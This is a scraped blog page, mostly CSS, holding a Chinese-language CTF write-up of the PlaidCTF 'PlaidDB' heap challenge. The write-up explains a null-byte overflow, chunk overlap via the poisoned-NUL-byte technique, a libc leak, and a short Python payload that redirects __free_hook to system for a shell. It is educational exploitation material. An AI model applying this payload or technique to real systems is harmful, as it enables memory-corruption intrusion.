h1:hover a.anchor, h2:hover a.anchor, h3:hover a.anchor, h4:hover a.anchor, h5:hover a.anchor, h6:hover a.anchor {
background: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAA09pVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADw/eHBhY2tldCBiZWdpbj0i77u/IiBpZD0iVzVNME1wQ2VoaUh6cmVTek5UY3prYzlkIj8+IDx4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3JlIDUuMy1jMDExIDY2LjE0NTY2MSwgMjAxMi8wMi8wNi0xNDo1NjoyNyAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIgeG1sbnM6eG1wPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvIiB4bWxuczp4bXBNTT0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wL21tLyIgeG1sbnM6c3RSZWY9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9zVHlwZS9SZXNvdXJjZVJlZiMiIHhtcDpDcmVhdG9yVG9vbD0iQWRvYmUgUGhvdG9zaG9wIENTNiAoMTMuMCAyMDEyMDMwNS5tLjQxNSAyMDEyLzAzLzA1OjIxOjAwOjAwKSAgKE1hY2ludG9zaCkiIHhtcE1NOkluc3RhbmNlSUQ9InhtcC5paWQ6OUM2NjlDQjI4ODBGMTFFMTg1ODlEODNERDJBRjUwQTQiIHhtcE1NOkRvY3VtZW50SUQ9InhtcC5kaWQ6OUM2NjlDQjM4ODBGMTFFMTg1ODlEODNERDJBRjUwQTQiPiA8eG1wTU06RGVyaXZlZEZyb20gc3RSZWY6aW5zdGFuY2VJRD0ieG1wLmlpZDo5QzY2OUNCMDg4MEYxMUUxODU4OUQ4M0REMkFGNTBBNCIgc3RSZWY6ZG9jdW1lbnRJRD0ieG1wLmRpZDo5QzY2OUNCMTg4MEYxMUUxODU4OUQ4M0REMkFGNTBBNCIvPiA8L3JkZjpEZXNjcmlwdGlvbj4gPC9yZGY6UkRGPiA8L3g6eG1wbWV0YT4gPD94cGFja2V0IGVuZD0iciI/PsQhXeAAAABfSURBVHjaYvz//z8DJYCRUgMYQAbAMBQIAvEqkBQWXI6sHqwHiwG70TTBxGaiWwjCTGgOUgJiF1J8wMRAIUA34B4Q76HUBelAfJYSA0CuMIEaRP8wGIkGMA54bgQIMACAmkXJi0hKJQAAAABJRU5ErkJggg==) no-repeat 10px center;
text-decoration: none; }
h1 tt, h1 code {
font-size: inherit; }
h2 tt, h2 code {
font-size: inherit; }
h3 tt, h3 code {
font-size: inherit; }
h4 tt, h4 code {
font-size: inherit; }
h5 tt, h5 code {
font-size: inherit; }
h6 tt, h6 code {
font-size: inherit; }
h1 {
font-size: 28px;
color: black; }
h2 {
font-size: 24px;
border-bottom: 1px solid #cccccc;
color: black; }
h3 {
font-size: 18px; }
h4 {
font-size: 16px; }
h5 {
font-size: 14px; }
h6 {
color: #777777;
font-size: 14px; }
p, blockquote, ul, ol, dl, li, table, pre {
margin: 15px 0; }
hr {
background: transparent url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAYAAAAECAYAAACtBE5DAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAyJpVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADw/eHBhY2tldCBiZWdpbj0i77u/IiBpZD0iVzVNME1wQ2VoaUh6cmVTek5UY3prYzlkIj8+IDx4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3JlIDUuMC1jMDYwIDYxLjEzNDc3NywgMjAxMC8wMi8xMi0xNzozMjowMCAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIgeG1sbnM6eG1wPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvIiB4bWxuczp4bXBNTT0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wL21tLyIgeG1sbnM6c3RSZWY9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9zVHlwZS9SZXNvdXJjZVJlZiMiIHhtcDpDcmVhdG9yVG9vbD0iQWRvYmUgUGhvdG9zaG9wIENTNSBNYWNpbnRvc2giIHhtcE1NOkluc3RhbmNlSUQ9InhtcC5paWQ6OENDRjNBN0E2NTZBMTFFMEI3QjRBODM4NzJDMjlGNDgiIHhtcE1NOkRvY3VtZW50SUQ9InhtcC5kaWQ6OENDRjNBN0I2NTZBMTFFMEI3QjRBODM4NzJDMjlGNDgiPiA8eG1wTU06RGVyaXZlZEZyb20gc3RSZWY6aW5zdGFuY2VJRD0ieG1wLmlpZDo4Q0NGM0E3ODY1NkExMUUwQjdCNEE4Mzg3MkMyOUY0OCIgc3RSZWY6ZG9jdW1lbnRJRD0ieG1wLmRpZDo4Q0NGM0E3OTY1NkExMUUwQjdCNEE4Mzg3MkMyOUY0OCIvPiA8L3JkZjpEZXNjcmlwdGlvbj4gPC9yZGY6UkRGPiA8L3g6eG1wbWV0YT4gPD94cGFja2V0IGVuZD0iciI/PqqezsUAAAAfSURBVHjaYmRABcYwBiM2QSA4y4hNEKYDQxAEAAIMAHNGAzhkPOlYAAAAAElFTkSuQmCC) repeat-x 0 0;
border: 0 none;
color: #cccccc;
height: 4px;
padding: 0;
}
body > h2:first-child {
margin-top: 0;
padding-top: 0; }
body > h1:first-child {
margin-top: 0;
padding-top: 0; }
body > h1:first-child + h2 {
margin-top: 0;
padding-top: 0; }
body > h3:first-child, body > h4:first-child, body > h5:first-child, body > h6:first-child {
margin-top: 0;
padding-top: 0; }
a:first-child h1, a:first-child h2, a:first-child h3, a:first-child h4, a:first-child h5, a:first-child h6 {
margin-top: 0;
padding-top: 0; }
h1 p, h2 p, h3 p, h4 p, h5 p, h6 p {
margin-top: 0; }
li p.first {
display: inline-block; }
li {
margin: 0; }
ul, ol {
padding-left: 30px; }
ul :first-child, ol :first-child {
margin-top: 0; }
dl {
padding: 0; }
dl dt {
font-size: 14px;
font-weight: bold;
font-style: italic;
padding: 0;
margin: 15px 0 5px; }
dl dt:first-child {
padding: 0; }
dl dt > :first-child {
margin-top: 0; }
dl dt > :last-child {
margin-bottom: 0; }
dl dd {
margin: 0 0 15px;
padding: 0 15px; }
dl dd > :first-child {
margin-top: 0; }
dl dd > :last-child {
margin-bottom: 0; }
blockquote {
border-left: 4px solid #dddddd;
padding: 0 15px;
color: #777777; }
blockquote > :first-child {
margin-top: 0; }
blockquote > :last-child {
margin-bottom: 0; }
table {
padding: 0;border-collapse: collapse; }
table tr {
border-top: 1px solid #cccccc;
background-color: white;
margin: 0;
padding: 0; }
table tr:nth-child(2n) {
background-color: #f8f8f8; }
table tr th {
font-weight: bold;
border: 1px solid #cccccc;
margin: 0;
padding: 6px 13px; }
table tr td {
border: 1px solid #cccccc;
margin: 0;
padding: 6px 13px; }
table tr th :first-child, table tr td :first-child {
margin-top: 0; }
table tr th :last-child, table tr td :last-child {
margin-bottom: 0; }
img {
max-width: 100%; }
span.frame {
display: block;
overflow: hidden; }
span.frame > span {
border: 1px solid #dddddd;
display: block;
float: left;
overflow: hidden;
margin: 13px 0 0;
padding: 7px;
width: auto; }
span.frame span img {
display: block;
float: left; }
span.frame span span {
clear: both;
color: #333333;
display: block;
padding: 5px 0 0; }
span.align-center {
display: block;
overflow: hidden;
clear: both; }
span.align-center > span {
display: block;
overflow: hidden;
margin: 13px auto 0;
text-align: center; }
span.align-center span img {
margin: 0 auto;
text-align: center; }
span.align-right {
display: block;
overflow: hidden;
clear: both; }
span.align-right > span {
display: block;
overflow: hidden;
margin: 13px 0 0;
text-align: right; }
span.align-right span img {
margin: 0;
text-align: right; }
span.float-left {
display: block;
margin-right: 13px;
overflow: hidden;
float: left; }
span.float-left span {
margin: 13px 0 0; }
span.float-right {
display: block;
margin-left: 13px;
overflow: hidden;
float: right; }
span.float-right > span {
display: block;
overflow: hidden;
margin: 13px auto 0;
text-align: right; }
code, tt {
margin: 0 2px;
padding: 0 5px;
white-space: nowrap;
border: 1px solid #eaeaea;
background-color: #f8f8f8;
border-radius: 3px; }
pre code {
margin: 0;
padding: 0;
white-space: pre;
border: none;
background: transparent; }
.highlight pre {
background-color: #f8f8f8;
border: 1px solid #cccccc;
font-size: 13px;
line-height: 19px;
overflow: auto;
padding: 6px 10px;
border-radius: 3px; }
pre {
background-color: #f8f8f8;
border: 1px solid #cccccc;
font-size: 13px;
line-height: 19px;
overflow: auto;
padding: 6px 10px;
border-radius: 3px; }
pre code, pre tt {
background-color: transparent;
border: none; }
sup {
font-size: 0.83em;
vertical-align: super;
line-height: 0;
}
* {
-webkit-print-color-adjust: exact;
}
@media screen and (min-width: 914px) {
body {
width: 854px;
margin:0 auto;
}
}
@media print {
table, pre {
page-break-inside: avoid;
}
pre {
word-wrap: break-word;
}
}
</style>
</head>
<body>
<h1 id="toc_0">PlaidDB [550]</h1>
<h3 id="toc_1">程式行為及概述</h3>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwEFaBguLC1YlDUQyWcpj6u3GgWYADffb1j3d6qhsHiDs8A-p5xS87IAa_H0eq2ipaXFUBQxFP-hwRjLeXNAoRDY2kK7JxfnKBwKpfbF2E584730_OKT9jQsb784AwV6KE0ZS020T3kGU/s1600/pctf1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwEFaBguLC1YlDUQyWcpj6u3GgWYADffb1j3d6qhsHiDs8A-p5xS87IAa_H0eq2ipaXFUBQxFP-hwRjLeXNAoRDY2kK7JxfnKBwKpfbF2E584730_OKT9jQsb784AwV6KE0ZS020T3kGU/s400/pctf1.png" width="400" height="142" /></a></div>
<p>如名稱所述是個 database 的 service ,可加入資料進 db,而每筆資料都配合一組 key,並以 binary tree 的方式去儲存,其中每個 node 都有個 row struct 大致上如下</p>
<pre><code class="language-c">struct row {
char *key
int size
char *content
row *left
row *right
row *parent
bool is_leaf
}
</code></pre>
<p>而他有的功能如下</p>
<ul>
<li>GET
<ul>
<li>分配放 key 的空間,輸入 key , 可獲得 db 的內容,最後再把剛分配的空間 free 掉</li>
</ul></li>
<li>PUT
<ul>
<li>一開使會先分配 0x38 byte 放置 row ,再分配 8 byte 放 key,再依據所輸入的 size 大小,分配相對應的空間給你
,而在輸入 key 時會檢查所輸入 key 的空間夠不夠用,一旦不夠用就會重新 realloc 兩倍的空間給你</li>
</ul></li>
<li>DUMP
<ul>
<li>會將所有 key 的資訊 dump 出來</li>
</ul></li>
<li>DEL
<ul>
<li>分配放 key 的空間,輸入 key 之後,會先比對是否 key 是否有在 tree 中,若有,則將相對應的 key、content、row 及用來比對 key 依序 free 掉,*<em>若無則返回 menu 選單(並沒有將剛剛用來比對的 key free 掉),這部分在後續排 heap 的階段頗好用 *</em> </li>
</ul></li>
<li>EXIT
<ul>
<li>離開程式</li>
</ul></li>
</ul>
<h3 id="toc_2">漏洞</h3>
<ul>
<li>NULL byte overflow
<ul>
<li>再所有輸入 key 的功能中一旦把 key 輸入完就會在結尾補上零,然而在輸入的 key 剛好是最大分配的空間時,並不會重新 realloc 而卻也會在最後補上 <code>\x00</code> 此時,造成了 overflow ,並蓋到了 malloc_chunk 中的 size 欄位</li>
</ul></li>
</ul>
<h3 id="toc_3">保護機制</h3>
<ul>
<li>CANARY : ENABLED</li>
<li>FORTIFY : ENABLED</li>
<li>NX : ENABLED</li>
<li>PIE : ENABLED</li>
<li>RELRO : FULL</li>
</ul>
<h3 id="toc_4">漏洞利用及思路</h3>
<ul>
<li><p>此題一開始想觸發 unlink,但發現難以利用,很難找到一個 pointer 指回自己,也沒有看出可以 leak memory 的地方,後來看到了 <a href="http://googleprojectzero.blogspot.tw/2014/08/the-poisoned-nul-byte-2014-edition.html">google project zero</a> 及 <a href="http://www.contextis.com/documents/120/Glibc_Adventures-The_Forgotten_Chunks.pdf">Glibc Adventures: The Forgotten Chunks</a> 的用法,才理解到這題主要在考的是讓 chunk overlap 的情況,其中大致上的概念如下</p>
<ul>
<li>一開始先 malloc 三塊相鄰的 chunk</li>
</ul>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4IKQO1cJZLEU0B9N0uCoyp_xDarHYRahamHS2aZkMd71qFT3-4wyRahVjKfS80GMJwMmBAbo4St1Apt4oB5_UTft5roqeFx4s3PdjK_YrDVfKRfcZwkJ9uITEMvpZudDPgu2w_w8P7eQ/s1600/pctf2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4IKQO1cJZLEU0B9N0uCoyp_xDarHYRahamHS2aZkMd71qFT3-4wyRahVjKfS80GMJwMmBAbo4St1Apt4oB5_UTft5roqeFx4s3PdjK_YrDVfKRfcZwkJ9uITEMvpZudDPgu2w_w8P7eQ/s400/pctf2.png" width="400" height="300" /></a></div>
<ul>
<li>接著 free(B)</li>
</ul>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEio0DYQdoJJEM3U7eAl15_nrpTAHdPt9ZpYrRBlpnksb0qChbep5pd4eLiBNklrnL8BdXn-jxv8EiB33v0XI3VHXELaiz_4PVH_q87P1WcYoSJX2aQhWs237mVB0M8AwhPvT74ayL2R7xQ/s1600/pctf3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEio0DYQdoJJEM3U7eAl15_nrpTAHdPt9ZpYrRBlpnksb0qChbep5pd4eLiBNklrnL8BdXn-jxv8EiB33v0XI3VHXELaiz_4PVH_q87P1WcYoSJX2aQhWs237mVB0M8AwhPvT74ayL2R7xQ/s400/pctf3.png" width="400" height="300" /></a></div>
<ul>
<li>Null byte overflow ,這時候 libc 會認為這塊 chunk 剩下 0x100 的空間,但 c chunk 的 <code>prev_size</code> 卻是紀錄還有 0x120 byte</li>
</ul>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-FO-NLLaRYAEUFYRoN-uAAY5zObHFxc3sz2dr-909ixPrNuIHj3IE3jZzN2ptpp7_qUQB690W2vijQgXvDWMG-U8d6euuc9zfbMuahddXLnlLhS3pqAgKERkAE5eIxO_iclpMik2lcTs/s1600/pctf4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-FO-NLLaRYAEUFYRoN-uAAY5zObHFxc3sz2dr-909ixPrNuIHj3IE3jZzN2ptpp7_qUQB690W2vijQgXvDWMG-U8d6euuc9zfbMuahddXLnlLhS3pqAgKERkAE5eIxO_iclpMik2lcTs/s400/pctf4.png" width="400" height="300" /></a></div>
<ul>
<li><code>malloc(D)</code> 會先從剛加入 unsortbin 的 chunk 中切出 chunk</li>
</ul>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqUOkoLqQys7gAKxqXDeeyzw44XrEHtJizQY7cYSIxVdeDWto1bpJhl3Z1WK_GaUnWVpaOzCJVOaG-W7ZoqVAg6vA4H2KLKykXt5mzo_f5BbnEgUwMoavd_1-e7I_tuJ8vU-pDfMA8KEQ/s1600/pctf5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqUOkoLqQys7gAKxqXDeeyzw44XrEHtJizQY7cYSIxVdeDWto1bpJhl3Z1WK_GaUnWVpaOzCJVOaG-W7ZoqVAg6vA4H2KLKykXt5mzo_f5BbnEgUwMoavd_1-e7I_tuJ8vU-pDfMA8KEQ/s400/pctf5.png" width="400" height="300" /></a></div>
<ul>
<li><code>malloc(E)</code> 一樣從未分配完的 chunk 在切出空間來給 user</li>
</ul>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjovx63sxRhwM3XovboZB53sfmc0rL3rEQ65MpV_1ejbFLMKXtK6_uLkR7at8EuDoBUyvT9swo2U1BELphGHCiiocwcSAHL5WolRs7UrsNE3aZf1LKgucL2u_PTWFMRsvQ8THDk8YiKpmk/s1600/pctf6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjovx63sxRhwM3XovboZB53sfmc0rL3rEQ65MpV_1ejbFLMKXtK6_uLkR7at8EuDoBUyvT9swo2U1BELphGHCiiocwcSAHL5WolRs7UrsNE3aZf1LKgucL2u_PTWFMRsvQ8THDk8YiKpmk/s400/pctf6.png" width="400" height="300" /></a></div>
<ul>
<li><code>free(D)</code> 此時 D 也會被加入 unsortbin</li>
</ul>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHBg2-bxKAZq7UPIJQs1lWXlA6yvJLMyAxYQBG-CqudGim8Nrf1dW8w_BaFNeJRezN5gHtDhf9qTnbwr2HHkvczyBmtlP9iKFngVZGHy9MXueMYf0mhnzOkopDjtMEUIvfgRw3P4IF3G0/s1600/pctf7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHBg2-bxKAZq7UPIJQs1lWXlA6yvJLMyAxYQBG-CqudGim8Nrf1dW8w_BaFNeJRezN5gHtDhf9qTnbwr2HHkvczyBmtlP9iKFngVZGHy9MXueMYf0mhnzOkopDjtMEUIvfgRw3P4IF3G0/s400/pctf7.png" width="400" height="300" /></a></div>
<ul>
<li><code>free(C)</code> 此時 free 會根據C 這塊 chunk 的 <code>prev_size</code> 去找尋上一塊chunk 因此會認為 D 開始到 C 前都是同一塊 chunk 並認為這塊 chunk 有 0x120 byte 卻不知道中間已經有一塊已經分配出去的 chunk ,並將它們合併成 0x220 byte的 chunk</li>
</ul>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYkuRQQFlxm_DAiluVG1o7Y7SrbCm6rkmM0Gozvhvo8mS7cdJU3muwDtcvbgSp1OI6IZrt_QgHh_5HzVF-Y3D5U8HiZGYE7nXadXWGrnq_1ieqX4SY6ia84dKO_uJRsiiuu_nhXPYKLHY/s1600/pctf8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYkuRQQFlxm_DAiluVG1o7Y7SrbCm6rkmM0Gozvhvo8mS7cdJU3muwDtcvbgSp1OI6IZrt_QgHh_5HzVF-Y3D5U8HiZGYE7nXadXWGrnq_1ieqX4SY6ia84dKO_uJRsiiuu_nhXPYKLHY/s400/pctf8.png" width="400" height="300" /></a></div>
<ul>
<li><code>malloc(0x200)</code> 再次 malloc 夠大的空間時,會將之前已經分配出去的 chunk 一併也取進來,但使用者可以任意寫入該區內容,也就是 E 這塊 chunk 可以任意被改動,這題剛好就是讓 plaiddb 的<code>row struct</code>落在這一塊而被任意改動</li>
</ul>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4_xp6A_Rt3syEhiANoaCltSnEyxm5qGTGhNbTRWQ4VKRJIOldAsqW8mQpaqJE3kNCyiB4Dxi8KZDRJ5BfjzcfMvbXF06OqyXq23CVydshC_qBgEqTx1oppiLeplFLXyCrk9s37BMPuIE/s1600/pctf9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4_xp6A_Rt3syEhiANoaCltSnEyxm5qGTGhNbTRWQ4VKRJIOldAsqW8mQpaqJE3kNCyiB4Dxi8KZDRJ5BfjzcfMvbXF06OqyXq23CVydshC_qBgEqTx1oppiLeplFLXyCrk9s37BMPuIE/s400/pctf9.png" width="400" height="300" /></a></div>
<li><p>利用上述的手法改道舊有的 <code>row struct</code> 其實就已經差不多了,可微調 size 大小,讓舊有的 key 也落入 overlap 的 chunk 中,並很巧妙的 free 掉時,讓 free 將 bin 的位置剛好填入舊有的 key 之中,並用 <code>DUMP</code> 就可以 leak 出 libc 的 base ,接著將舊有的 row 夠造成下列的形式</p></li>
</ul>
<pre><code class="language-python">payload = pack64(binsh)
payload += pack64(7)
payload += pack64(0)
payload += pack64(free_hook)
payload += pack64(free_hook-0x30)
payload += pack64(free_hook)
payload += pack64(system)
</code></pre>
<ul>
<li>接著在 DELE 時 , 就會將 system 寫入 free_hook 的欄位中,當下次在 free 時等同於也執行了 system,不過當 <code>DELE</code> 動作快結束時就可以拿到 shell ,這邊其實只要稍微 trace 或是用 binary tree 刪除節點的概念就會知道他如何去寫入了,細節我就不多寫了</li>
</ul>
<h3 id="toc_5">心得</h3>
<ul>
<li>很可惜的沒在兩天內解完,最後都排得差不多了,但時間還是差一點點,寫 explit 速度還是太慢,這題的關鍵主要在排 heap 的部分,因為 fastbin 並不會觸發 unlink 不容易達成上述描述的情況,必須想辦法利用 key 來製造 smallbin 的大小,至於排的過程就不詳細描述了,如果有時間的話大家可以去解解看慢慢體會一下 :-)</li>
</ul>
<h3 id="toc_6">Exploit</h3>
<p><a href="https://github.com/scwuaptx/CTF/blob/master/pctf/plaiddb.py">exploit</a></p>
</body>Angelboyhttp://www.blogger.com/profile/18328929488044413856noreply@blogger.com0tag:blogger.com,1999:blog-8137060704643839542.post-36388043834692614242015-04-02T21:08:00.000-07:002016-10-10T21:16:36.329-07:000ctf 2015 Write-up <style type="text/css">
a {
color: #4183C4; }
a.absent {
color: #cc0000; }
a.anchor {
display: block;
padding-left: 30px;
margin-left: -30px;
cursor: pointer;
position: absolute;
top: 0;
left: 0;
bottom: 0; }
h1, h2, h3, h4, h5, h6 {
margin: 20px 0 10px;
padding: 0;
font-weight: bold;
-webkit-font-smoothing: antialiased;
cursor: text;
position: relative; }
h1:hover a.anchor, h2:hover a.anchor, h3:hover a.anchor, h4:hover a.anchor, h5:hover a.anchor, h6:hover a.anchor {
background: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAA09pVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADw/eHBhY2tldCBiZWdpbj0i77u/IiBpZD0iVzVNME1wQ2VoaUh6cmVTek5UY3prYzlkIj8+IDx4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3JlIDUuMy1jMDExIDY2LjE0NTY2MSwgMjAxMi8wMi8wNi0xNDo1NjoyNyAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIgeG1sbnM6eG1wPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvIiB4bWxuczp4bXBNTT0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wL21tLyIgeG1sbnM6c3RSZWY9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9zVHlwZS9SZXNvdXJjZVJlZiMiIHhtcDpDcmVhdG9yVG9vbD0iQWRvYmUgUGhvdG9zaG9wIENTNiAoMTMuMCAyMDEyMDMwNS5tLjQxNSAyMDEyLzAzLzA1OjIxOjAwOjAwKSAgKE1hY2ludG9zaCkiIHhtcE1NOkluc3RhbmNlSUQ9InhtcC5paWQ6OUM2NjlDQjI4ODBGMTFFMTg1ODlEODNERDJBRjUwQTQiIHhtcE1NOkRvY3VtZW50SUQ9InhtcC5kaWQ6OUM2NjlDQjM4ODBGMTFFMTg1ODlEODNERDJBRjUwQTQiPiA8eG1wTU06RGVyaXZlZEZyb20gc3RSZWY6aW5zdGFuY2VJRD0ieG1wLmlpZDo5QzY2OUNCMDg4MEYxMUUxODU4OUQ4M0REMkFGNTBBNCIgc3RSZWY6ZG9jdW1lbnRJRD0ieG1wLmRpZDo5QzY2OUNCMTg4MEYxMUUxODU4OUQ4M0REMkFGNTBBNCIvPiA8L3JkZjpEZXNjcmlwdGlvbj4gPC9yZGY6UkRGPiA8L3g6eG1wbWV0YT4gPD94cGFja2V0IGVuZD0iciI/PsQhXeAAAABfSURBVHjaYvz//z8DJYCRUgMYQAbAMBQIAvEqkBQWXI6sHqwHiwG70TTBxGaiWwjCTGgOUgJiF1J8wMRAIUA34B4Q76HUBelAfJYSA0CuMIEaRP8wGIkGMA54bgQIMACAmkXJi0hKJQAAAABJRU5ErkJggg==) no-repeat 10px center;
text-decoration: none; }
h1 tt, h1 code {
font-size: inherit; }
h2 tt, h2 code {
font-size: inherit; }
h3 tt, h3 code {
font-size: inherit; }
h4 tt, h4 code {
font-size: inherit; }
h5 tt, h5 code {
font-size: inherit; }
h6 tt, h6 code {
font-size: inherit; }
h1 {
font-size: 28px;
color: black; }
h2 {
font-size: 24px;
border-bottom: 1px solid #cccccc;
color: black; }
h3 {
font-size: 18px; }
h4 {
font-size: 16px; }
h5 {
font-size: 14px; }
h6 {
color: #777777;
font-size: 14px; }
p, blockquote, ul, ol, dl, li, table, pre {
margin: 15px 0; }
hr {
background: transparent url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAYAAAAECAYAAACtBE5DAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAyJpVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADw/eHBhY2tldCBiZWdpbj0i77u/IiBpZD0iVzVNME1wQ2VoaUh6cmVTek5UY3prYzlkIj8+IDx4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3JlIDUuMC1jMDYwIDYxLjEzNDc3NywgMjAxMC8wMi8xMi0xNzozMjowMCAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIgeG1sbnM6eG1wPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvIiB4bWxuczp4bXBNTT0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wL21tLyIgeG1sbnM6c3RSZWY9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9zVHlwZS9SZXNvdXJjZVJlZiMiIHhtcDpDcmVhdG9yVG9vbD0iQWRvYmUgUGhvdG9zaG9wIENTNSBNYWNpbnRvc2giIHhtcE1NOkluc3RhbmNlSUQ9InhtcC5paWQ6OENDRjNBN0E2NTZBMTFFMEI3QjRBODM4NzJDMjlGNDgiIHhtcE1NOkRvY3VtZW50SUQ9InhtcC5kaWQ6OENDRjNBN0I2NTZBMTFFMEI3QjRBODM4NzJDMjlGNDgiPiA8eG1wTU06RGVyaXZlZEZyb20gc3RSZWY6aW5zdGFuY2VJRD0ieG1wLmlpZDo4Q0NGM0E3ODY1NkExMUUwQjdCNEE4Mzg3MkMyOUY0OCIgc3RSZWY6ZG9jdW1lbnRJRD0ieG1wLmRpZDo4Q0NGM0E3OTY1NkExMUUwQjdCNEE4Mzg3MkMyOUY0OCIvPiA8L3JkZjpEZXNjcmlwdGlvbj4gPC9yZGY6UkRGPiA8L3g6eG1wbWV0YT4gPD94cGFja2V0IGVuZD0iciI/PqqezsUAAAAfSURBVHjaYmRABcYwBiM2QSA4y4hNEKYDQxAEAAIMAHNGAzhkPOlYAAAAAElFTkSuQmCC) repeat-x 0 0;
border: 0 none;
color: #cccccc;
height: 4px;
padding: 0;
}
body > h2:first-child {
margin-top: 0;
padding-top: 0; }
body > h1:first-child {
margin-top: 0;
padding-top: 0; }
body > h1:first-child + h2 {
margin-top: 0;
padding-top: 0; }
body > h3:first-child, body > h4:first-child, body > h5:first-child, body > h6:first-child {
margin-top: 0;
padding-top: 0; }
a:first-child h1, a:first-child h2, a:first-child h3, a:first-child h4, a:first-child h5, a:first-child h6 {
margin-top: 0;
padding-top: 0; }
h1 p, h2 p, h3 p, h4 p, h5 p, h6 p {
margin-top: 0; }
li p.first {
display: inline-block; }
li {
margin: 0; }
ul, ol {
padding-left: 30px; }
ul :first-child, ol :first-child {
margin-top: 0; }
dl {
padding: 0; }
dl dt {
font-size: 14px;
font-weight: bold;
font-style: italic;
padding: 0;
margin: 15px 0 5px; }
dl dt:first-child {
padding: 0; }
dl dt > :first-child {
